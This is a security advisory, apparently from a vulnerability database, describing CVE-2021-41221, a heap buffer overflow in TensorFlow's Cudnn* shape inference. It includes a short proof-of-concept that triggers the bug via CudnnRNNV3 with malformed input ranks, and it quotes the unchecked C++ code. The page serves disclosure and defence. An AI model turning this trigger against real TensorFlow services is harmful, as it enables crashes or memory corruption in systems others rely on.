CVE-2021-41221: Access to invalid memory during shape inference in `Cudnn*` ops
(updated )
The shape inference code for the Cudnn* operations in TensorFlow can be tricked into accessing invalid memory, via a heap buffer overflow:
import tensorflow as tf
@tf.function
def func():
return tf.raw_ops.CudnnRNNV3(
input=[0.1, 0.1],
input_h=[0.5],
input_c=[0.1, 0.1, 0.1],
params=[0.5, 0.5],
sequence_lengths=[-1, 0, 1])
func()
This occurs because the ranks of the input, input_h and input_c parameters are not validated, but code assumes they have certain values:
auto input_shape = c->input(0);
auto input_h_shape = c->input(1);
auto seq_length = c->Dim(input_shape, 0);
auto batch_size = c->Dim(input_shape, 1); // assumes rank >= 2
auto num_units = c->Dim(input_h_shape, 2); // assumes rank >= 3
References
- github.com/advisories/GHSA-cqv6-3phm-hcwx
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-630.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-828.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-413.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/af5fcebb37c8b5d71c237f4e59c6477015c78ce6
- github.com/tensorflow/tensorflow/security/advisories/GHSA-cqv6-3phm-hcwx
- nvd.nist.gov/vuln/detail/CVE-2021-41221
Detect and mitigate CVE-2021-41221 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →